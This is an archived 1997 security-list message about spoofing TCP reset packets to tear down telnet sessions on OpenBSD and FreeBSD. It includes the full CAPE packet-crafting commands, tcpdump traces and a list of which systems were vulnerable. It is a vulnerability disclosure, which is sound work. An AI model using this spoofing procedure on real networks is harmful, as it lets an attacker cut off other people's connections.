Darren Reed brought this up in June, 1997, on the NetBSD security list, after which I performed some tests. I ended up with a number of questions after doing this, but never followed up to determine what was going on. Anyways, here's my old message - Oliver Network Associates, Inc. ------ Ok, here's how my tests turned out: I have 3 systems involved: 199.185.231.20 - OpenBSD system 199.185.231.24 - FreeBSD system 199.185.231.25 - BSDI system I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from the OpenBSD system using tcpdump and CAPE. 20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10] 20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10] So I'm logged into FreeBSD from port 3349 on the BSDI system. On OpenBSD.. bash# ./cape -i Welcome to CAPE. "help" for general help, "help topic" for help on topic Active network interfaces: - Interface: lo0 Address: 127.0.0.1 - Interface: ed2 Address: 199.185.231.20 cape> iface=ed2 cape> gateway=199.185.231.24 cape> ip cape> ip_src=199.185.231.23 cape> ip_dst=199.185.231.24 cape> ip_proto=IPPROTO_TCP cape> tcp cape> tcp_sport=3349 cape> tcp_dport=23 cape> tcp_flags=RST cape> send Processing: Packet transmitted Here's my spoofed packet with random seq/ack numbers: 20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096 As soon as I hit a key on the FreeBSD system... [20:25:01] [freebsd] [/usr/local/scanner] % Connection closed by foreign host. Poof, it works, repeatable every time. This works when spoofing the packet from the BSDI system TO the FreeBSD system. For some reason (which I've been unable to figure out yet, I cannot spoof packets from the FreeBSD system to the BSDI system and have this work). This works between OpenBSD and FreeBSD however (both ways). This doesn't work against Solaris. Here's what I found with the systems here: OpenBSD 2.1 - vulnerable FreeBSD 2.1.x - vulnerable BSDI - appears not vulnerable (?) Solaris 2.5 - appears not vulnerable IRIX 6.2 - appears not vulnerable Linux - appears not vulnerable Windows NT - appears not vulnerable
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:31 PDT